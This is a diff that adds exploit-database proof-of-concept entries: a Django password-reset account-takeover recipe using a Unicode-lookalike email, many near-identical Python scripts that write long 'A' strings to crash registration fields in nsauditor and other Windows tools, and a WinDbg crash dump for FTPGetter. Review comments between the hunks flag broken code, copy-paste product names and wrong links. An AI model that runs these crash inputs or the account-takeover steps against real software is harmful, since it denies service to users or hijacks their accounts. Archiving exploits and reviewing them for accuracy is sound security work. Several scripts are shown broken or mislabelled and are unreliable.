+>>> User = get_user_model()
+>>> User.objects.create_user('mike123', 'mike@example.org', 'test123')
+```
+
+## Procedure For Reproducing
+
+1. Run `./manage.py runserver`
+1. Open `http://127.0.0.1:8000/accounts/password-reset/`
+1. Input `mıke@example.org` (Attacker's email), and click send button
+1. Receive email (Check console), and reset password
+1. Login as `mike123` user
\ No newline at end of file
diff --git a/exploits/windows/dos/47848.py b/exploits/windows/dos/47848.py
new file mode 100755
index 000000000..061177e2e
--- /dev/null
+++ b/exploits/windows/dos/47848.py
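Review bot: The README never explains the trick: step 3 submits `mıke@example.org` with a dotless ı (U+0131) for the user created as `mike@example.org`, and nothing says why that matters or why PostgreSQL is a hard requirement. Add a sentence such as `The password-reset form looks the user up case-insensitively; on PostgreSQL the Unicode case folding makes ı match i, and the reset mail goes to the attacker-supplied address` — that is my reading of CVE-2019-19844, the vulnerable lookup is not in this hunk, so confirm it before adding. Also record which Django version `requirements.txt` pins, because the PoC only works against releases before the 2019-12-18 fix, and the commit subject `Django < 3.0 < 2.2 < 1.11` does not name the patched versions.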
@@ -0,0 +1,33 @@
+# Exploit Title: NetShareWatcher 1.5.8.0 - 'Name' Denial Of Service
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install NetShareWatcher
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Name' and click on 'Ok'
+6.NetShareWatcher Crashed
+'''
+
+#!/usr/bin/python
+
+buffer = "A" * 1000
+
+payload = buffer
+try:
+ f=open("poc.txt","w")
+ print("[+] Creating %s bytes evil payload." %len(payload))
+ f.write(payload)
+ f.close()
+ print("[+] File created!")
+except:
+ print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47853.py b/exploits/windows/dos/47853.py
new file mode 100755
index 000000000..bd7b43953
--- /dev/null
+++ b/exploits/windows/dos/47853.py
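Review bot: `#!/usr/bin/python` on line 21 is not a shebang, because a shebang only takes effect on the first line of the file; move it above the header comments or drop it. The bare `except:` swallows every error, including `KeyboardInterrupt`, and prints `File cannot be created.` without the reason; use `except OSError as exc: print("File cannot be created: %s" % exc)`. The entry also gives no crash evidence (exception code, faulting module, register state) for the 1000-byte input, so a reader cannot tell an unhandled access violation from a handled error dialog.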
@@ -0,0 +1,33 @@
+# Exploit Title: NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install BlueAuditor
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Key' and click on 'Ok'
+6.BlueAuditor Crashed
+'''
+
+#!/usr/bin/python
+
+buffer = "A" * 1000
+
+payload = buffer
+try:
+ f=open("poc.txt","w")
+ print("[+] Creating %s bytes evil payload." %len(payload))
+ f.write(payload)
+ f.close()
+ print("[+] File created!")
+except:
+ print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47855.py b/exploits/windows/dos/47855.py
new file mode 100755
index 000000000..baba1cdd5
--- /dev/null
+++ b/exploits/windows/dos/47855.py
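Review bot: The PoC steps are a copy-paste from the BlueAuditor entry: step 1 says `Download and install BlueAuditor` and step 6 `BlueAuditor Crashed`, while the title and download link are NetworkSleuth 3.0.0.0. Correct both lines to `1.Download and install NetworkSleuth` and `6.NetworkSleuth Crashed`. As in the sibling scripts, the `#!/usr/bin/python` line is not on line 1 and has no effect, and the bare `except:` hides why a file write failed.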
@@ -0,0 +1,33 @@
+# Exploit Title: SpotIE 2.9.5 - 'Key' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/spotie_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install BlueAuditor
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Key' and click on 'Ok'
+6.BlueAuditor Crashed
+'''
+
+#!/usr/bin/python
+
+buffer = "A" * 1000
+
+payload = buffer
+try:
+ f=open("poc.txt","w")
+ print("[+] Creating %s bytes evil payload." %len(payload))
+ f.write(payload)
+ f.close()
+ print("[+] File created!")
+except:
+ print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47856.py b/exploits/windows/dos/47856.py
new file mode 100755
index 000000000..317ff05ae
--- /dev/null
+++ b/exploits/windows/dos/47856.py
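Review bot: Steps 1 and 6 name BlueAuditor (`Download and install BlueAuditor`, `BlueAuditor Crashed`) but this entry is for SpotIE 2.9.5; change them to `1.Download and install SpotIE` and `6.SpotIE Crashed`. Step 3 also has an unclosed quote in `"Register -> Enter Registration Code`. The `#!/usr/bin/python` placed after the docstring is inert, so the file has to be run with an explicit interpreter, and the bare `except:` should at least print the exception.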
@@ -0,0 +1,33 @@
+# Exploit Title: Dnss Domain Name Search Software - 'Key' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install Dnss
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Key' and click on 'Ok'
+6.Dnss Crashed
+'''
+
+#!/usr/bin/python
+
+buffer = "A" * 1000
+
+payload = buffer
+try:
+ f=open("poc.txt","w")
+ print("[+] Creating %s bytes evil payload." %len(payload))
+ f.write(payload)
+ f.close()
+ print("[+] File created!")
+except:
+ print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47857.py b/exploits/windows/dos/47857.py
new file mode 100755
index 000000000..888688818
--- /dev/null
+++ b/exploits/windows/dos/47857.py
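Review bot: `Link Software` points to `networksleuth_setup.exe`, the NetworkSleuth installer, not the Dnss Domain Name Search Software this entry crashes, and the header gives no Dnss version at all. Without the right installer and a `# Version:` line the `Tested on` claim cannot be reproduced or matched to an affected range. The `except:` on the last lines should print the exception so a failed write is distinguishable from a permissions problem.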
@@ -0,0 +1,33 @@
+# Exploit Title: BlueAuditor 1.7.2.0 - 'Name' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/blueauditor_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install BlueAuditor
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Name' and click on 'Ok'
+6.BlueAuditor Crashed
+'''
+
+#!/usr/bin/python
+
+buffer = "A" * 1000
+
+payload = buffer
+try:
+ f=open("poc.txt","w")
+ print("[+] Creating %s bytes evil payload." %len(payload))
+ f.write(payload)
+ f.close()
+ print("[+] File created!")
+except:
+ print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47859.py b/exploits/windows/dos/47859.py
new file mode 100755
index 000000000..65d1339c1
--- /dev/null
+++ b/exploits/windows/dos/47859.py
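Review bot: The entry asserts `BlueAuditor Crashed` after pasting 1000 `A`s into the 'Name' registration field, but gives no evidence of the crash: no exception code, faulting module or register/stack snapshot, and no statement of whether the process terminates or merely shows an error dialog. The faulting module and exception code from a debugger or the Windows Error Reporting event are the minimum for a DoS PoC; without them the title's "Denial of Service" is unsupported. The shebang on line 21 is not on the first line and is therefore ignored.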
@@ -0,0 +1,33 @@
+# Exploit Title: ShareAlarmPro Advanced Network Access Control - 'Key' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install ShareAlarmPro
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Key' and click on 'Ok'
+6.ShareAlarmPro Crashed
+'''
+
+#!/usr/bin/python
+
+buffer = "A" * 1000
+
+payload = buffer
+try:
+ f=open("poc.txt","w")
+ print("[+] Creating %s bytes evil payload." %len(payload))
+ f.write(payload)
+ f.close()
+ print("[+] File created!")
+except:
+ print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47860.py b/exploits/windows/dos/47860.py
new file mode 100755
index 000000000..bd85284d3
--- /dev/null
+++ b/exploits/windows/dos/47860.py
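Review bot: `Link Software` is `networksleuth_setup.exe`, the NetworkSleuth installer, but the product under test is ShareAlarmPro, and the header omits a ShareAlarmPro version, so there is nothing to match an affected-version range against. Replace the link with the ShareAlarmPro download and add a `# Version:` line. The bare `except:` at the end masks why `poc.txt` could not be written; catch `OSError` and print it.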
@@ -0,0 +1,33 @@
+# Exploit Title: NetShareWatcher 1.5.8.0 - 'Key' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install NetShareWatcher
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Key' and click on 'Ok'
+6.NetShareWatcher Crashed
+'''
+
+#!/usr/bin/python
+
+buffer = "A" * 1000
+
+payload = buffer
+try:
+ f=open("poc.txt","w")
+ print("[+] Creating %s bytes evil payload." %len(payload))
+ f.write(payload)
+ f.close()
+ print("[+] File created!")
+except:
+ print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47861.py b/exploits/windows/dos/47861.py
new file mode 100755
index 000000000..0ff878eae
--- /dev/null
+++ b/exploits/windows/dos/47861.py
@@ -0,0 +1,33 @@
+# Exploit Title: Dnss Domain Name Search Software - 'Name' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install Dnss
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Name' and click on 'Ok'
+6.Dnss Crashed
+'''
+
+#!/usr/bin/python
+
+buffer = "A" * 1000
+
+payload = buffer
+try:
+ f=open("poc.txt","w")
+ print("[+] Creating %s bytes evil payload." %len(payload))
+ f.write(payload)
+ f.close()
+ print("[+] File created!")
+except:
+ print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47862.py b/exploits/windows/dos/47862.py
new file mode 100755
index 000000000..1b84f60a3
--- /dev/null
+++ b/exploits/windows/dos/47862.py
@@ -0,0 +1,28 @@
+# Exploit Title: TextCrawler Pro3.1.1 - Denial of Service (PoC)
+# Date: 2020-05-01
+# Vendor Homepage:https://www.digitalvolcano.co.uk/index.html
+# Software Link: https://www.digitalvolcano.co.uk/download/TextCrawlerPro=setup.exe
+# Exploit Author: Achilles
+# Tested Version: 3.1.1
+# Tested on: Windows 7 x64
+
+
+# 1.- Run python code :TextCrawler.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open TextCrawler Pro
+# 4.- Paste the content of EVIL.txt into the Field: 'License key'
+# 5.- Click 'Activate' and you will see a crash.
+
+
+
+#!/usr/bin/env python
+buffer =3D "\x41" * 6000
+
+try:
+open("Evil.txt","w")
+print "[+] Creating %s bytes evil payload.." %len(buffer)
+f.write(buffer)
+f.close()
+print "[+] File created!"
+except:
+print "File cannot be created"
\ No newline at end of file
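Review bot: In 47862.py the body of the `try:` block is not indented and `open("Evil.txt","w")` is never bound to a name, so the script stops with an `IndentationError` before running, and with the indentation repaired `f.write(buffer)` would raise `NameError`, which the bare `except:` then reports as "File cannot be created". `buffer =3D "\x41" * 6000` is a quoted-printable artifact (`=3D` is an encoded `=`) from an e-mail submission, and the `print` statements are Python 2 only, which together suggest the file was committed without being executed; the same three problems recur in 47873.py, where the offending line reads `f.open("Evil.txt","w")`. Step 2 refers to `EVIL.txt` while the code writes `Evil.txt`, which differ on a case-sensitive filesystem. The `# Date: 2020-05-01` header is later than the commit date and is presumably a transposition of 2020-01-05, the date given in 47873.py.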
diff --git a/exploits/windows/dos/47863.py b/exploits/windows/dos/47863.py
new file mode 100755
index 000000000..4dbbe8e99
--- /dev/null
+++ b/exploits/windows/dos/47863.py
@@ -0,0 +1,33 @@
+# Exploit Title: RemShutdown 2.9.0.0 - 'Key' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/remshutdown_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install RemShutdown
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Key' and click on 'Ok'
+6.RemShutdown Crashed
+'''
+
+#!/usr/bin/python
+
+buffer = "A" * 1000
+
+payload = buffer
+try:
+ f=open("poc.txt","w")
+ print("[+] Creating %s bytes evil payload." %len(payload))
+ f.write(payload)
+ f.close()
+ print("[+] File created!")
+except:
+ print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47864.py b/exploits/windows/dos/47864.py
new file mode 100755
index 000000000..62a2fb41a
--- /dev/null
+++ b/exploits/windows/dos/47864.py
@@ -0,0 +1,33 @@
+# Exploit Title: Backup Key Recovery Recover Keys Crashed Hard Disk Drive 2.2.5 - 'Key' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/backeyrecovery_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install Backup Key Recovery
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Key' and click on 'Ok'
+6.Backup Key Recovery Crashed
+'''
+
+#!/usr/bin/python
+
+buffer = "A" * 1000
+
+payload = buffer
+try:
+ f=open("poc.txt","w")
+ print("[+] Creating %s bytes evil payload." %len(payload))
+ f.write(payload)
+ f.close()
+ print("[+] File created!")
+except:
+ print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47865.py b/exploits/windows/dos/47865.py
new file mode 100755
index 000000000..8a107324c
--- /dev/null
+++ b/exploits/windows/dos/47865.py
@@ -0,0 +1,33 @@
+# Exploit Title: RemShutdown 2.9.0.0 - 'Name' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/remshutdown_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install RemShutdown
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Name' and click on 'Ok'
+6.RemShutdown Crashed
+'''
+
+#!/usr/bin/python
+
+buffer = "A" * 1000
+
+payload = buffer
+try:
+ f=open("poc.txt","w")
+ print("[+] Creating %s bytes evil payload." %len(payload))
+ f.write(payload)
+ f.close()
+ print("[+] File created!")
+except:
+ print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47866.py b/exploits/windows/dos/47866.py
new file mode 100755
index 000000000..665a507d9
--- /dev/null
+++ b/exploits/windows/dos/47866.py
@@ -0,0 +1,33 @@
+# Exploit Title: NBMonitor 1.6.6.0 - 'Key' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nbmonitor.com/downloads/nbmonitor_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install NBMonitor
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Key' and click on 'Ok'
+6.NBMonitor Crashed
+'''
+
+#!/usr/bin/python
+
+buffer = "A" * 1000
+
+payload = buffer
+try:
+ f=open("poc.txt","w")
+ print("[+] Creating %s bytes evil payload." %len(payload))
+ f.write(payload)
+ f.close()
+ print("[+] File created!")
+except:
+ print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47867.py b/exploits/windows/dos/47867.py
new file mode 100755
index 000000000..ac906ffce
--- /dev/null
+++ b/exploits/windows/dos/47867.py
@@ -0,0 +1,63 @@ +# Exploit Title: Office Product Key Finder 1.5.4 - Denial of Service (PoC) +# Date: 2020-01-06 +# Vendor Homepage: http://www.nsauditor.com/ +# Software Link: http://www.nsauditor.com/downloads/officeproductkeyfinder_setup.exe +# Exploit Author: Gokkul +# Tested Version: v1.5.4 +# Tested on: Windows 7 x64 + +# Software Description: +# Office Product Key Finder is offline product key finder software and allows to recover and +# find microsoft office 25 character product key for Microsoft Office 2013, Microsoft Office 2010, +# Microsoft Office 2007 and Microsoft Office 2003 installed on your PC or on network computers. + + +# 1.- Download and install Office Product Key Finder +# 2.- Run python code : Office Product Key Finder.py + +#!/usr/bin/env python +DoS=("\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41") + +myfile=open('CRASHER.txt','w') +myfile.writelines(Dos) +myfile.close() +print("File created") + +# 3.- Open CRASHER.txt and copy content to clipboard +# 4.- Open Office Product Key Finder and under the Register tab Click 'Enter Registration Code' +# 5.- Paste the content of CRASHER.txt into the Field: 'Name and Key' +# 6.- click 'OK' you will see a crash. \ No newline at end of file diff --git a/exploits/windows/dos/47868.py b/exploits/windows/dos/47868.py new file mode 100755 index 000000000..a5239e1ce --- /dev/null +++ b/exploits/windows/dos/47868.py 
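Review bot: `myfile.writelines(Dos)` references `Dos`, but the literal is assigned to `DoS` on the line after the shebang, so the script raises `NameError` before `CRASHER.txt` is created; the two names must agree, and `myfile.write(DoS)` is the intended call since `writelines` on a `str` iterates it character by character. The run of `\x41` bytes contains a single `\x74` in the middle of the literal; if it is deliberate the header should say so, otherwise it is a typo that should be removed so the input is the uniform run the rest of the literal suggests. The file is opened with no `with` block and no error handling, unlike the other scripts in this commit, so an unwritable working directory yields an unexplained traceback instead of a message.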
@@ -0,0 +1,33 @@
+# Exploit Title: SpotFTP FTP Password Recovery 3.0.0.0 - 'Name' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/spotftp_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install SpotFTP
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Name' and click on 'Ok'
+6.SpotFTP Crashed
+'''
+
+#!/usr/bin/python
+
+buffer = "A" * 1000
+
+payload = buffer
+try:
+ f=open("poc.txt","w")
+ print("[+] Creating %s bytes evil payload." %len(payload))
+ f.write(payload)
+ f.close()
+ print("[+] File created!")
+except:
+ print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47869.py b/exploits/windows/dos/47869.py
new file mode 100755
index 000000000..668c7ee0c
--- /dev/null
+++ b/exploits/windows/dos/47869.py
@@ -0,0 +1,33 @@
+# Exploit Title: SpotMSN 2.4.6 - 'Name' Denial of Service (PoC)
+# Exploit Author: Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/spotmsn_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install SpotMSN
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Name' and click on 'Ok'
+6.SpotMSN Crashed
+'''
+
+#!/usr/bin/python
+
+buffer = "A" * 1000
+
+payload = buffer
+try:
+ f=open("poc.txt","w")
+ print("[+] Creating %s bytes evil payload." %len(payload))
+ f.write(payload)
+ f.close()
+ print("[+] File created!")
+except:
+ print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47870.py b/exploits/windows/dos/47870.py
new file mode 100755
index 000000000..0f4ab5542
--- /dev/null
+++ b/exploits/windows/dos/47870.py
@@ -0,0 +1,33 @@
+# Exploit Title: SpotIM 2.2 - 'Name' Denial Of Service
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/spotim_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install SpotIM
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Name' and click on 'Ok'
+6.SpotIM Crashed
+'''
+
+#!/usr/bin/python
+
+buffer = "A" * 1000
+
+payload = buffer
+try:
+ f=open("poc.txt","w")
+ print("[+] Creating %s bytes evil payload." %len(payload))
+ f.write(payload)
+ f.close()
+ print("[+] File created!")
+except:
+ print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47871.txt b/exploits/windows/dos/47871.txt
new file mode 100644
index 000000000..f9e844205
--- /dev/null
+++ b/exploits/windows/dos/47871.txt
@@ -0,0 +1,153 @@
+# Exploit Title: FTPGetter Professional 5.97.0.223 - Denial of Service (PoC)
+# Google Dork: N/A
+# Date: 2020-01-03
+# Exploit Author: FULLSHADE
+# Vendor Homepage: https://www.ftpgetter.com/
+# Software Link: https://www.ftpgetter.com/ftpgetter_pro_setup.exe
+# Version: v.5.97.0.223
+# Tested on: Windows 7
+# CVE : N/A
+
+==================================================================
+THE BUG : NULL pointer dereference -> DOS crash
+==================================================================
+
+The FTPGetter Professional v.5.97.0.223 FTP client suffers from a
+NULL pointer dereference vulnerability via the program not properly
+handling user input when setting the field "Run program" under
+profile properties, it triggers when executing the profile.
+
+==================================================================
+DISCLOSURE : Vendor contacted : MITRE assignment : CVE-2020-5183
+==================================================================
+...
+...
+==================================================================
+WINDBG ANALYSIS AFTER SENDING 50,000 'A' BYTES
+==================================================================
+
+(b84.e88): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=00000000 ebx=0255d3a0 ecx=04000000 edx=00000030 esi=00000000 edi=00000001
+eip=00855994 esp=0012fbd0 ebp=0012fc6c iopl=0 nv up ei pl zr na pe nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
+*** ERROR: Symbol file could not be found. Defaulted to export symbols for FTPGetter.exe -
+FTPGetter!Xtermforminitialization$qqrv+0x202d74:
+00855994 8b5004 mov edx,dword ptr [eax+4] ds:0023:00000004=????????
+
+0:000> !analyze -v
+*******************************************************************************
+* *
+* Exception Analysis *
+* *
+*******************************************************************************
+
+*** ERROR: Symbol file could not be found. Defaulted to export symbols for ftpgcore.dll -
+Failed calling InternetOpenUrl, GLE=12007
+
+FAULTING_IP:
+FTPGetter!Xtermforminitialization$qqrv+202d74
+00855994 8b5004 mov edx,dword ptr [eax+4]
+
+EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
+ExceptionAddress: 00855994 (FTPGetter!Xtermforminitialization$qqrv+0x00202d74)
+ ExceptionCode: c0000005 (Access violation)
+ ExceptionFlags: 00000000
+NumberParameters: 2
+ Parameter[0]: 00000000
+ Parameter[1]: 00000004
+Attempt to read from address 00000004
+
+FAULTING_THREAD: 00000e88
+
+PROCESS_NAME: FTPGetter.exe
+
+ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.
+
+EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.
+
+EXCEPTION_PARAMETER1: 00000000
+
+EXCEPTION_PARAMETER2: 00000004
+
+READ_ADDRESS: 00000004
+
+FOLLOWUP_IP:
+FTPGetter!Xtermforminitialization$qqrv+202d74
+00855994 8b5004 mov edx,dword ptr [eax+4]
+
+MOD_LIST:
+
+NTGLOBALFLAG: 0
+
+APPLICATION_VERIFIER_FLAGS: 0
+
